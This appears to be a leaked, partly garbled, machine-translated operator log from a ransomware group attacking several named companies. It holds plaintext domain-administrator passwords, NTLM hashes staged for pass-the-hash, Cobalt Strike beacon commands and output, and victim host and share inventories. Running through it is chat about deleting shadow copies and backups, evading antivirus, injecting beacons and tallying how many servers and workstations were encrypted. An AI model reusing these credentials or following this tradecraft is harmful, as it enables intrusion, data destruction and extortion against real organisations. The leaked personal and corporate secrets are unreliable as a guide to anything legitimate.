Microsoft_WinInet_127.0.0.1:8888/Resilio Sync\OVERLAND\administrator 01 00 00 00 00 d0 8c 9d df 01 15 d1 11 8c 7a 00 c0 4f c2 97 eb 01 00 00 00 1d e4 39 cf 1d a3 58 45 b0 85 d2 13 e4 2f f1 8a 00 00 00 18 00 00 00 57 00 49 00 4e 00 49 00 4e 00 45 00 54 00 43 00 00 72 00 65 00 64 00 00 00 03 66 00 00 c0 00 00 00 10 00 00 00 71 ea fe 67 c8 17 d9 2c 2e 12 e4 22 8c 22 43 02 02 00 00 00 00 00 04 80 00 00 00 a0 00 00 00 10 00 00 00 b5 19 a8 93 30 eb e3 90 7f 59 42 64 56 a9 7c 6b 30 00 00 00 00 dd bc 4f 35 c9 ac 00 f0 56 0a 70 a6 60 e4 c4 6d 18 6c 69 34 b7 bf db 4d e1 39 88 82 9b e4 79 1a d9 ca bc 53 b8 58 9b 97 f7 e7 c6 6a 09 d6 36 c0 14 00 00 00 b6 44 ee 96 18 c2 65 dc 9b 49 d4 dd 0f 06 a1 26 bb fb 32 9f `````` http://10.69.0.22:5000/ --------------------------- nas https://10.69.0.173/login.html ------------------------- idrac-HYPERVDEV2|PowerEdge R320 https://10.69.0.70/login.html --------------------------- idrac-7ND5CZ1 | PowerEdge R520 ``There was a paste pass in the story, but no kred, I thought that his kreds would fit, wrote that would not lock in the future on the paste pass was in his browser? to ``https://lastpass.com` where? Logan has a paste pass, but the password ``M@ythe4th!`` did not fit. URL : https://mail.overland.com/ Username : overland\administrator Password : Vi3wSon!c `````` URL : https://id.atlassian.com/signup/welcome Username : logan@overland.com Password : M@ythe4th! `````` URL : https://gravityzone.bitdefender.com/ Username : logan@overland.com Password : M@ythe4th! `````` 10.69.26.205\OVR026-R002\R002 r002 10.69.0.242\TEST044-R002\R002 r002 ``two domains out of three or four pkdas.'' in that domain already work, as you prepare, I will give you sessions of 2 extended domains So there are two more domains? You can see only one trust first get in here and work there? 
Pinging AD1.overland.com [10.69.0.35] with 32 bytes of data: Reply from 10.69.0.35: bytes=32 time=10ms TTL=127 Ping statistics for 10.69.0.35: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 10ms, Maximum = 10ms, Average = 10ms beacon> portscan 10.69.0.35 445 none [*] Tasked beacon to scan ports 445 on 10.69.0.35 [+] host called home, sent: 93285 bytes [+] received output: 10.69.0.35:445 Scanner module is complete ``user9tl2ot`` overland.com\dynamics:bobc@t! overland.com\Administrator:Vi3wSon!c overland.com\mahesh.admin:Changeme! overland.com\zerto:CR@CKer$ ``I don't know what NAC is)`` only the document directory was empty, the rest were already empty, or did you clean it up?`` Directory of \89.0.10.104\Music 04/10/2019 04:05 PM . 04/10/2019 04:01 PM . 0 File(s) 0 bytes 2 Dir(s) 1,660,207,595,520 bytes free [+] received output: Volume in drive \89.0.10.104\Pictures is Pictures Volume Serial Number is 8C90-29F2 Directory of \89.0.10.104Pictures 04/10/2019 04:05 PM . 04/10/2019 04:01 PM . 0 File(s) 0 bytes 2 Dir(s) 1,660,207,595,520 bytes free beacon> shell dir \\89.0.10.104\Videos [*] Tasked beacon to run: dir \89.0.10.104\Videos [+] host called home, sent: 55 bytes [+] received output: Volume in drive\\89.0.10.104\Videos is Videos Volume Serial Number is 42A8-E058 Directory of \89.0.10.104/Videos 04/10/2019 04:05 PM . 04/10/2019 04:01 PM . 0 File(s) 0 bytes 2 Dir(s) 1,660,207,595,520 bytes free ``Either they rolled it back somehow or we didn't shut it down it didn't work during the lock? 
I'm on it under rdpne shut down for some reason`` dn:CN=FR-VIR2008-02,OU=Beaune Servers,OU=RTP,DC=rtpco,DC=local >objectClass: top >objectClass: person >objectClass: organizationalPerson >objectClass: user >objectClass: computer >cn: FR-VIR2008-02 >distinguishedName: CN=FR-VIR2008-02,OU=Beaune Servers,OU=RTP,DC=rtpco,DC=local >instanceType: 4 >whenCreated: 20170630081330.0Z >whenChanged: 20201222161043.0Z >uSNCreated: 3171670 >info: General >uSNChanged: 7602866 >name: FR-VIR2008-02 >objectGUID: {1A3B911B-4323-4851-905A-C22EE5FB2BC5} >userAccountControl: 4096 >codePage: 0 >countryCode: 0 >lastLogon: 131862572618621371 >localPolicyFlags: 0 >pwdLastSet: 132515171874060018 >primaryGroupID: 515 >objectSid: S-1-5-21-3928074412-3075804946-2887454908-18665 >accountExpires: 9223372036854775807 >logonCount: 0 >sAMAccountName: FR-VIR2008-02$ >sAMAccountType: 805306369 >operatingSystem: Windows Server 2008 R2 Standard >operatingSystemVersion: 6.1 (7601) >operatingSystemServicePack: Service Pack 1 >dNSHostName: FR-VIR2008-02.rtpco.local ``I'd like to get an rdp on the server, mask the disk, and run a utility, I'll get right on it`` 104.243.44.69:13574 Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7 ``Work through this kobua, you'd better not spawn there are about 10 alive3056``. beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes [+] received output: rtpco.local ``I don't have a livekind in which cob? no more? and delete the shadow copies there frispace after deleting backupatut someone 1 need to make a note) thank you fine once you've deleted it, fuck it. beacon> help mv Use: mv [source file] [dest file] Move source file to the specified destination beacon> help cp Use: cp [source file] [dest file] Copy source file to the specified destination ``and cp like cb like cb can also mvdata about del? 
shell del jethacjust rm in cb works and shell rm does not let me wonder....the funny thing is that through the command does not let me delete, but through the gui all right deletes but strange fuck that does not let me change but lets me delete))) check the other folders sosyakses of danayd I can not understand what the fuck, copy muv not work, but tear it down to rubbish mozhet you move them somewhere and shishifuye?really? and maybe just delete them and not bother? that will overwrite it? echo 1 > backup file oldest[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=skgH6wEiuWraA93mM) this[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=9iffb4WttEQtYmzbk) yes the rest of the files are also busy processes? as i understand, no rights to these files i have write permissions to write to them i also have this bug on 2 types of files. so what? or only 1 last one? why are you surprised that it did not work? @tl2 said it depends on the edition + he said it protects the process and you did it through mapp[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=X6jW2zvhB4xZy4DAc) .there was kasper on armas? swallowed right on the frame)))) said kasper fucks with it))) @tl2do write them the same extensiona rename the files on the pesa restart on the servers where the process is not finished? all 5 are still alive[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=CLumsmxBztKP6w9pw) alreadyeeeee and from there start or on the arm live on the server where there is a sessionIn the old ones, all normal encrypted and was visible as the grid lay down, but here it was like a bitch terminatorzamapte this nasnet, there was like everything was similar that only part of the files closed? 
in the old networks mean the same ?[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=zaEjaabka5bHD9ZZM) see, just uploaded at this point there?well i threw the file there with dk under the creeds and from the server under other creeds (creeds and cars from different domains) write access is exactly there? yesterday i zamped it to 2 cars, today i checked and mapped to another 3 and run again on the 5 cars before it was the same? + dk on 5 different cars nas where was it mapped?the rest of them all are still alive? a few cars flew away[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=huJe2tEuab32Xa7C9) ?the file is 300 kb if it says it's broken then open and open it which is not closed take 1 dock file no sessions? VirtualAlloc sees and all will fall in the principles of injection and you end up with a session but even INHERIT nothing, not even a small process) as soon as the process is created - kasper protects itIt means that you "create" the process and not injected into another one it staging channel from his file establishesbacon "in itself "neta bicon is not injected?it's not injected in any way (it can skip the start of the binary if it's cleaned out normally but it's only a question of editorial independence i haven't met it and even comet flushes with scasper))) plus it starts onboot it can't be nailed down it misses a session but he won't let it get in the way, kasper's exactly very very angry in the right edition but it depends on the editionDon't bitdeffende on admin's computer the strongest averter is kasper in terms of meme integritimb confuse again kasper or kaseya? kasper we can't outrun the injector kasper it's bad they put him on protection lately lissimantik has become bitingThere kasper underpoint on some chtiolsamantek - very formidableA what about wilson with aver? 
and 1 on 2 others)3 people will work with him so that wilsonart not all so easy)we have a problem in wilsonart there are 6 trusts still have access, but either the dll crashes or the traffic is blockedd there are two more with the rights + 2 more or new will come? so there is only left #wilsonart-comna tomorrow planned 3 grids for the day)tomorrow to 51.done.rtpcompany.comas tomorrow to what time? winona.rtpco.local 118 cars per hell 64 armies on the winona (10 alive) 53 servers (71 alive) ``Everything's pulled and everything's encrypted,`` ``It's fine, it's not pulled, but it's mapped and the crits are killed ``` 8 servers didn't pull up ``us.alloypolymers.com Closed servers 24 out of 24 Armas pulled up all 23rtpco.local Closed servers 64 out of 65 Armies pulled all 152 one dk fell off\schedule, he some bullshit counts not the whole hell not the whole stats closed write how many were pinged yes, the status is preparing `` rtpco.local 65 servakov 152 arma ``` ``` us.alloypolymers.com\ arm 23 serv 24 ``` No 8 servers were connected? So at least the temp and sys32a drive is different? type D or maybe there is some other one? and the Windows folder is untouched? I guess it does not go there or there``? 06/19/2019 07:00 PM Windows Defender 06/10/2020 01:13 AM Windows Mail 06/10/2020 01:13 AM Windows Media Player 07/16/2016 07:23 AM Windows Multimedia Platform 07/16/2016 07:23 AM Windows NT 06/10/2020 01:13 AM Windows Photo Viewer 07/16/2016 07:23 AM Windows Portable Devices 07/16/2016 07:23 AM WindowsPowerShell ``but the program files and x86 program files are untouched this is today's date to see if you can check the touch dates of the files and folders with your hands repawn? ``The appearance of a note is no guarantee that the locker went through the entire hard drive``. I've had one die, but the rdmi on it showed up ``` if the process fell off where the injected - then the locker stood up, and after the process did not fall off? 
came to me one died out, but the udmi on it appeared and the statistics for all domains-sessions were not colored during the inject? we went around the cassette. it seems))) for joy, what do you mean, if there's everywhere, you can slam the dk already =)) check it out there are dodobites and dk all when everything else dies dk fuck them at the end as always, except dk@tl1@tl2?there are some other services that can take up important data there is nothing to add to the batik? just in case you have questions, do not forget to leave the services on the mapped cars if you do not have it will not finish you roadmap) sure what above do not pull @tl1``? pth us.alloypolymers.com\adonixadmin 88781646e2a2399370c54bae7f790e58 ALLOYAMMS: 10.1.1.231 ALLOYCRKT01: 10.1.5.250 - OHSPICEWORKS: 10.1.10.11 - ALLOYORGAPP01: 10.1.8.11 - ALLOYLICWEB: 10.1.1.238 --- ALLOYAPP3: 10.1.1.250 --- rtpco.local\O365Service 7facdc498ed1680c4fd1448319a8c04f AXFORMS-DEV: 10.89.11.111 - ONBASETEST: 10.89.11.10 - 89.0.10.121 - 89.0.192.80 - 89.0.191.172 - 89.0.192.3 - 89.0.193.15 - 10.1.10.146 - 89.0.192.202 - 10.58.58.91 - 10.89.11.34 - `````` 89.0.10.121 - 89.0.192.80 - 89.0.191.172 - 89.0.192.3 - 89.0.193.15 - 10.1.10.146 - 89.0.192.202 - 10.58.58.91 - 10.89.11.34 - `````` ALLOYEXCH02: 10.1.1.240 + GAHDC2: 10.1.10.81 + GAHDC01: 10.1.10.82 + ``Thank you[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=Y7LiqEPosNs6nCCna) rtpco.losal guys drop the adusers from all the domains ALLOYLICWEB: 10.1.1.238 --- ALLOYAPP3: 10.1.1.250 --- `````` rtpco.local\O365Service 7facdc498ed1680c4fd1448319a8c04f AXFORMS-DEV: 10.89.11.111 - ONBASETEST: 10.89.11.10 - ``Try pulling in''. 
pth us.alloypolymers.com\adonixadmin 88781646e2a2399370c54bae7f790e58 ALLOYAMMS: 10.1.1.231 - ALLOYEXCH02: 10.1.1.240 - - GAHDC2: 10.1.10.81 - ALLOYCRKT01: 10.1.5.250 - - OHSPICEWORKS: 10.1.10.11 - ALLOYORGAPP01: 10.1.8.11 - GAHDC01: 10.1.10.82 - ``cancelet 8669993c0b6f8d65cd206a0c9e1d598bO365Service 7facdc498ed1680c4fd1448319a8c04f I moved thecob from #wilsonart-com 74.118.138.118 https://neteric.com ---------------------------------------------------------------------------------------- 104.243.44.69:13574 Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7 `````` ++rtpco.local SERV++ AXAOS-TEST: 10.89.11.123 AXAOS-TRAINING: 10.89.11.122 WINONAV1: 10.89.11.22 AXBATCH-TEST: 10.89.11.112 AXAOS-BUILD: 10.89.11.120 SAN-HQ: 10.89.11.35 AXDEV3: 10.89.11.103 AXDEV6: 10.89.11.106 AXDEV1: 10.89.11.101 MINITABLIC: 10.89.11.6 AXDEV2: 10.89.11.102 TX-TESTSRV1: 10.58.0.166 AXSQL-DEV: 10.89.11.118 MXSTORAGE: 10.13.0.14 NEVADAHYPV1: 10.57.0.84 NVSTORAGE: 10.57.0.36 NVDC1: 10.57.0.32 MNDC2: 89.0.0.83 NEVADAHYPV1: 10.57.0.25 ++us.alloypolymers.com++ RICHMONDDC1: 10.1.1.248 ALLOYLICWEB: 10.1.1.238 ALLOYAPP3: 10.1.1.250 `````` ++rtpco.local SERV++ STORAGEWINONA: 10.89.11.13 CTXCONNECTOR1: 10.89.11.26 CTXCONNECTOR2: 10.89.11.27 RDSL: 10.89.11.21 SQLPROD1: 10.89.0.99 CTXAPP3: 10.89.11.28 KASEYA: 10.89.11.24 CTXAPP4: 10.89.11.11 ONBASETEST: 10.89.11.10 ONBASEPROD1: 10.89.11.7 ONBASETEST01: 10.89.11.33 WEBPROD01: 10.89.11.31 PDM01: 10.89.11.32 MAINTENANCE: 10.89.11.40 SOLARWINDS: 10.89.11.2 WINPAK01: 10.89.0.111 MNDC2: 89.0.0.81 STORAGEWINONA2: 10.89.11.14 EXCHANGE: 10.89.11.10 AXFORMS-DEV: 10.89.11.111 INDYDC1: 10.59.0.4 ADMT: 10.89.11.5 AXREPORTS-DEV: 10.89.11.121 `````` ++rtpco.local SERV++ FRANCEDC1: 10.4.0.25 FRANCEDC2: 10.4.0.26 FRANCESTORAGE: 10.4.0.27 FRANCEPRINTSRV: 10.4.0.28 GERMANYDC1: 10.20.0.40 GERMANYDC2: 10.20.0.41 FR-VIR2008-02: 10.4.0.19 GERMANYSTORAGE: 10.20.0.42 FRANCESAGE: 10.4.0.100 FRANCEINTERMEC: 10.4.0.72 FRANCEARCHIVE: 10.4.0.10 POLSTORAGE: 10.28.0.8 DC1POLAND: 10.28.0.5 
DC2POLAND: 10.28.0.6 DELLOME: 10.89.11.16 INDC2: 10.59.0.31 CAE1: 10.89.11.12 RTPSYSLOG: 89.0.192.125 INDYSTORAGE: 10.59.0.35 INVEEAM: 10.59.0.21 RTPAZAD: 10.89.0.190 RDSAPP4: 89.0.192.163 SYMMGR: 10.89.11.20 `````` ++rtpco.local++ SG20170712-NB: 10.5.1.89 24L5: 10.33.2.239 RTP-KEN: 10.7.2.208 30L43: 89.0.192.45 ADAM-DESKTOP: 89.0.192.87 BBDESK2: 89.0.192.80 23LL37: 89.0.193.36 23LL7: 10.12.1.7 29LL32: 10.25.0.136 31LL45: 10.36.5.247 10.89.11.3 DRAW ALL DISKS METROMTRREADER: 89.0.191.183 29LL9: 10.1.8.104 30L29: 10.1.8.157 DENNIS10: 10.33.255.253 LUNCHROOM2: 89.0.6.100 DEPCON10B: 89.0.192.150 30L59: 172.22.200.30 WIN7-INTERMEC: 10.4.72.72 26L22: 10.33.4.245 24L19: 172.22.200.18 25L32: 89.0.192.169 24L3: 10.33.1.250 25L21: 172.22.200.26 26L08: 10.58.0.197 29L06: 89.0.191.87 INDYTEST1: 10.59.0.105 25L12: 89.0.193.67 DEPCON10A: 89.0.192.146 32LL62: 89.0.192.244 30L69: 89.0.192.35 VIDEOINSIGHTDR: 10.89.11.33 CANCELET: 10.89.11.22 30L85: 89.0.192.92 26L07: 10.12.1.3 24L11: 10.58.0.135 26L13: 10.58.6.11 ORION24: 89.0.191.71 25L58: 10.58.0.231 28L24: 10.57.0.85 EQL-SAN1: 10.89.5.100 QATHERMAL: 89.0.191.80 30L60: 89.0.192.78 ````SDIJ*FHg78SDFGTI&SDtARTE%YET ``don't forget WOL ++rtpco.local++ 28LL75: 172.22.200.29 30L22: 10.1.5.151 W10-F2018-VIB: 10.4.1.46 W10-F2014-PYBA: 10.4.1.103 EQL-SAN2: 10.89.5.120 26L05: 172.22.200.24 30LL29: 89.0.192.177 30L17: 10.25.0.142 32LL29: 89.0.191.227 W10-P2017-LOG1: 10.28.0.179 26L29: 10.59.0.107 30L54: 89.0.191.174 28L10: 89.0.191.39 30L24A: 10.1.5.208 WINPAK-CLIENT: 10.89.11.1 30L03: 10.36.6.234 30L18: 172.22.200.76 26L59: 89.0.193.94 28LL56: 89.0.192.215 30L102: 10.59.0.120 30L96: 89.0.191.196 25L9: 89.0.191.43 SUZHOU-PROD: 10.7.2.61 33LL67: 89.0.192.215 28L40: 10.56.0.124 30L51: 10.56.0.126 DENNIS15: 89.0.88.20 DCHDESKTOP: 89.0.88.18 26L30: 89.0.191.217 30L41: 89.0.191.245 27L06: 89.0.192.160 25L5: 172.22.200.62 27L05: 172.22.200.59 25L52: 10.33.2.249 30L94: 10.59.0.156 28L16: 89.0.192.60 WIN7-2016-CHG: 10.28.0.100 AXUPS: 10.89.11.35 
KEMPENBOXX: 89.0.193.108 26L47: 10.25.0.130 BSDESKTOP: 89.0.10.101 5CG5093XY1: 10.1.8.146 MXL5040QYD-1: 10.1.8.220 `````` ++rtpco.local++ PRTMONITOR: 10.89.11.36 30L19: 89.0.192.127 27L04: 89.0.10.121 DEPCON10EM: 89.0.192.116 30L42: 89.0.192.83 27L12: 10.56.0.166 27L07: 89.0.191.57 30L10: 10.33.255.252 25L43: 172.22.200.66 30L47: 10.59.0.113 30L100: 89.0.192.80 30L98: 10.59.0.148 30L30: 10.1.8.145 25L38: 89.0.192.172 30L56: 89.0.191.172 30L36: 10.1.8.143 25L29: 89.0.192.3 PHONEROOMFR: 10.4.1.96 25L42: 89.0.193.15 30L65: 10.1.10.146 30L15: 172.22.200.16 VC1: 172.22.254.20 27L28: 172.22.200.11 WININTERMEC32: 89.0.192.202 32LL58: 10.58.58.91 26L15: 10.13.0.92 25L37: 89.0.192.47 USH832L0DT: 10.1.8.128 30L14: 10.36.5.236 UPS580: 89.0.191.216 SBRENNO: 89.0.193.38 22L10INDY: 10.89.11.34 25L23: 89.0.192.114 AVANITEN: 10.89.11.34 28L19: 89.0.191.215 W10-FR2018-CYC: 10.4.1.13 DEPCON10FR: 89.0.192.141 30L10: 89.0.193.76 26L251: 10.32.1.188 30L107: 89.0.191.64 25L59: 89.0.191.46 31LL19: 89.0.192.102 25L60: 89.0.193.101 ``So, what do we start? 
Work some more here then, then, https://www.alibisecurity.com/alibi-central-management-software`http://10.0.0.202/doc/page/login.asp`` - ALIBI ``http://10.0.0.21/```` SCCY-DC 10.0.0.5 TS 10.0.0.252 SCCY-LT08 10.0.0.22 SCCY-LT09 10.0.0.99 SCCY-LT10 10.0.0.88 TOOLROOM7106 10.1.4.150 RYAN-GT73VR 10.1.4.164 QVPRO-PC 10.0.0.93 QATRACKING 10.0.0.113 PRODUCTION-LT 192.168.113.2 ASSEMBLYROOM 10.0.0.28 MIKE-PC 10.1.4.210 MFGWIN10-1 10.0.0.110 SCCY-TOOLING 10.0.0.19 JOE-BOXX-W10 10.0.0.103 JOE-AIO2 10.0.0.89 ENGINEERING-PC2 10.1.4.205 ENGINEERING-PC1 10.1.4.178 CONNIE-MICRO 10.0.0.82 SCCY-FS 10.0.0.6 SCCY-16 10.0.0.102 SCCY-15 10.0.0.118 SCCY-12 10.0.0.111 SCCY-11 10.0.0.123 SCCY-10 10.0.0.41 SCCY-14 10.0.0.17 SCCY-09 10.0.0.119 SCCY-08 10.0.0.128 SCCY-07 10.0.30.143 SCCY-06 10.0.0.146 SCCY-21 10.0.0.147 SCCY-17 10.0.0.149 SCCY-TN01 10.0.30.147 SCCY-13 10.0.0.148 SCCY-18 10.0.0.116 SCCY-04 10.0.0.40 SCCY-03 10.0.0.57 SCCY-02 10.0.0.84 SCCY-19 10.0.0.62 SCCY-05 10.0.0.59 SCCY-01 10.0.0.76 DESKTOP-UMQJ809 10.1.4.230 SCCY-20 10.1.4.221 SCCY-NAS 10.1.4.175 SCCY-RECEIVING 10.0.0.91 SQL-VM 10.1.4.99 SCCY-LT3 10.0.0.75 SCCY-LT04 10.0.0.67 SCCY-LT05 10.0.0.71 SCCY-LT07 10.0.0.26 SCCY-MASONACS 10.0.30.3 `````` SCCY\vdsadmin T@ng0D0wn! SCCY\VannData Y33tC@nn0ns thank youuser7 but i forgot to delete it because my brain isn't even 20% working due to such a great work schedule[ ](https://mediaeveryone.com/group/sccy-com?msg=Q5how5FjdR49GsnJs) if ntds isn't related to hashes, it's a hash thing for google password keys or something they were asking a question or something someone was doing something about it.@user3 @user8[ ](https://mediaeveryone.com/group/sccy-com?msg=AL5cvDTfm6YBeQdpn) i nigdetsetka that little, there it worked for about 10 seconds...where else did you run it? chance of dropping after running it at times higherbx without parameters VERY much noise how many times i wrote at the end of the day - delete files, sessions in slipknot, it is not me why not deleted? 
```
199.4KB  fil  01/25/2021 17:31:02  msupdate.dll
1.2KB    fil  01/25/2021 17:39:36  ntds.pvk
```
Did you take off the badhound? If so, no parameters
?
how did you take it off? what were the startup parameters?
```
[+] Location: C:\Windows\Temp\*
 Size     Type  Last Modified        Name
 ----     ----  -------------        ----
          dir   01/25/2021 19:03:15  F18AC62B-E695-47FF-B459-2750FF73338D-Sigs
          dir   01/01/2021 13:35:09  WinSAT
 1.5MB    fil   01/25/2021 19:14:36  MpCmdRun.log
 773.6KB  fil   01/25/2021 19:03:34  MpSigStub.log
 199.4KB  fil   01/25/2021 17:31:02  msupdate.dll
 1.2KB    fil   01/25/2021 17:39:36  ntds.pvk
 256.0KB  fil   10/14/2020 17:41:18  TS_784C.tmp
 320.0KB  fil   10/14/2020 17:41:29  TS_A6D2.tmp
 1.0MB    fil   11/17/2020 08:43:16  UpdHealthTools.msi
```
Why are you working so dirty?
everything is the same old way, creds only from 1 NAS + add everyone to expFederal.com
I can't do anything with this lab. https://cloudgw.cpcc.edu/vpn/index.html
and what's up with that?)
Sure you're with them? I don't see a confab
I'll create expFederal.com = hobbes? Do you need a confab for that?
\USCHI-HD001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-HD001.Hobbes.loc\C$ - Default share \USCHI-HD001.Hobbes.loc\IPC$ - Remote IPC \USCHI-HD001.Hobbes.loc\print$ - Printer Drivers \USCHI-APG003.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-APG003.Hobbes.loc\C$ - Default share \USCHI-APG003.Hobbes.loc\E$ - Default share \USCHI-APG003.Hobbes.loc\F$ - Default share \USCHI-APG003.Hobbes.loc\IPC$ - Remote IPC \PCHIVH001.Hobbes.loc\ADMIN$ - Remote Admin \PCHIVH001.Hobbes.loc\C$ - Default share \\{\PCHIVH001.Hobbes.loc\E$ - Default share \PCHIVH001.Hobbes.loc\IPC$ - Remote IPC \PCHIVH001.Hobbes.loc\V$ - Default share \PCHIAPG015.Hobbes.loc\ADMIN$ - Remote Admin \PCHIAPG015.Hobbes.loc\C$ - Default share \PCHIAPG015.Hobbes.loc\IPC$ - Remote IPC \USCHI-MAXP001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-MAXP001.Hobbes.loc\C$ - Default share \USCHI-MAXP001.Hobbes.loc\IPC$ - Remote IPC \USCHI-MAXP001.Hobbes.loc\M$ - Default share \USCHI-MAXP001.Hobbes.loc\print$ - Printer Drivers \USCHI-LT002.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-LT002.Hobbes.loc\C$ - Default share \USCHI-LT002.Hobbes.loc\IPC$ - Remote IPC \USCHI-NET005.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-NET005.Hobbes.loc\C$ - Default share \USCHI-NET005.Hobbes.loc\E$ - Default share \USCHI-NET005.Hobbes.loc\IPC$ - Remote IPC \USCHI-NET005.Hobbes.loc\print$ - Printer Drivers \PCHIFSP001.Hobbes.loc\ADMIN$ - Remote Admin \PCHIFSP001.Hobbes.loc\Apps \\PCHIFSP001.Hobbes.loc\ARCH - \PCHIFSP001.Hobbes.loc\C$ - Default share \\PCHIFSP001.Hobbes.loc\Cad - \\{\PCHIFSP001.Hobbes.loc\Citrix - Citrix Profiles \PCHIFSP001.Hobbes.loc\CIVIL - \\PCHIFSP001.Hobbes.loc\COMM - \PCHIFSP001.Hobbes.loc\COMP - \PCHIFSP001.Hobbes.loc\CONST - \\PCHIFSP001.Hobbes.loc\D$ - Default share \\PCHIFSP001.Hobbes.loc\ELEC - \\PCHIFSP001.Hobbes.loc\EXEC - \\PCHIFSP001.Hobbes.loc\F$ - Default share \\PCHIFSP001.Hobbes.loc\FS-0043 - \\PCHIFSP001.Hobbes.loc\FS-0044 - \PCHIFSP001.Hobbes.loc\HR - \\{\PCHIFSP001.Hobbes.loc\IPC$ - Remote IPC \\PCHIFSP001.Hobbes.loc\IROA 
- IROA - ActiveInk Docs \PCHIFSP001.Hobbes.loc\MARKET - \PCHIFSP001.Hobbes.loc\MECH - \\{\PCHIFSP001.Hobbes.loc\MKTG - Business Operations \\PowerVault NAS Utilities - PowerVault NAS Utilities \PCHIFSP001.Hobbes.loc\Network - \PCHIFSP001.Hobbes.loc\Pccommon - \PCHIFSP001.Hobbes.loc\proj_ae - \PCHIFSP001.Hobbes.loc\proj_cvl - \PCHIFSP001.Hobbes.loc\proj_str - \\PCHIFSP001.Hobbes.loc\PTW6512 - \PCHIFSP001.Hobbes.loc\Restricted$ - \\PCHIFSP001.Hobbes.loc\Safety - \PCHIFSP001.Hobbes.loc\SCANS - \PCHIFSP001.Hobbes.locSECTLDR - \\{\PCHIFSP001.Hobbes.loc\Software$ - expFederal Software \\{\PCHIFSP001.Hobbes.loc\Standard - \PCHIFSP001.Hobbes.loc\STRUCT - \PCHIFSP001.Hobbes.loc\Sys - Project Folders \PCHIFSP001.Hobbes.loc\TENGCNST - \PCHIFSP001.Hobbes.loc\User$ - Users Folders \USCHI-NET001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-NET001.Hobbes.loc\C$ - Default share \USCHI-NET001.Hobbes.loc\E$ - Default share \USCHI-NET001.Hobbes.loc\IPC$ - Remote IPC \USCHI-NET001.Hobbes.loc\print$ - Printer Drivers \USCHI-NET001.Hobbes.loc\Software$ - \USCHI-NET001.Hobbes.loc/USCHI-PLT-0008 - Oce ColorWare Plotter 300 \USCHI-MSE001.Hobbes.loc/address - \USCHI-MSE001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-MSE001.Hobbes.loc\C$ - Default share \USCHI-MSE001.Hobbes.loc\E$ - Default share \USCHI-MSE001.Hobbes.loc\F$ - Default share \USCHI-MSE001.Hobbes.loc\G$ - Default share \USCHI-MSE001.Hobbes.loc\IPC$ - Remote IPC \USCHI-MSE004.Hobbes.loc\address - \USCHI-MSE004.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-MSE004.Hobbes.loc\C$ - Default share \USCHI-MSE004.Hobbes.loc\E$ - Default share \USCHI-MSE004.Hobbes.loc\F$ - Default share \USCHI-MSE004.Hobbes.loc\G$ - Default share \USCHI-MSE004.Hobbes.loc\IPC$ - Remote IPC \USCHI-APG004.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-APG004.Hobbes.loc\Analytics_c8466842-1a17-4bad-abad-7d935647974b - \USCHI-APG004.Hobbes.loc\C$ - Default share \USCHI-APG004.Hobbes.loc\E$ - Default share \USCHI-APG004.Hobbes.loc\F$ - Default share 
\\USCHI-APG004.Hobbes.loc\gthrsvc_c8466842-1a17-4bad-abad-7d935647974b-crawl-0 - Crawled Files Sharec8466842-1a17-4bad-abad-7d935647974b-crawl-0 \USCHI-APG004.Hobbes.loc\IPC$ - Remote IPC \USCHI-APG004.Hobbes.loc\print$ - Printer Drivers \USCHI-DCG002.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-DCG002.Hobbes.loc\C$ - Default share \USCHI-DCG002.Hobbes.loc\IPC$ - Remote IPC \USCHI-DCG002.Hobbes.loc\print$ - Printer Drivers \PCHIWSG005.Hobbes.loc\ADMIN$ - Remote Admin \PCHIWSG005.Hobbes.loc\AM - \PCHIWSG005.Hobbes.loc\AMM3EXT$ - BC-Meridian Extensions Share \PCHIWSG005.Hobbes.loc\C$ - Default share \PCHIWSG005.Hobbes.loc\F$ - Default share \PCHIWSG005.Hobbes.loc\IPC$ - Remote IPC \PCHIAPG016.Hobbes.loc\ADMIN$ - Remote Admin \PCHIAPG016.Hobbes.loc\C$ - Default share \PCHIAPG016.Hobbes.loc\IPC$ - Remote IPC \PCHIAPG016.Hobbes.loc\SophosUpdate - \PCHIAPG016.Hobbes.loc\SUMInstallSet - Sophos Update Manager Installer \USCHI-PWD001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-PWD001.Hobbes.loc\C$ - Default share \USCHI-PWD001.Hobbes.loc\E$ - Default share \USCHI-PWD001.Hobbes.loc\F$ - Default share \USCHI-PWD001.Hobbes.loc\G$ - Default share \USCHI-PWD001.Hobbes.loc\IPC$ - Remote IPC \USCHI-DCP001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-DCP001.Hobbes.loc\C$ - Default share \USCHI-DCP001.Hobbes.loc\DAG01.hobbes.loc - File share witness created for microsoft exchange database availability group DAG01. 
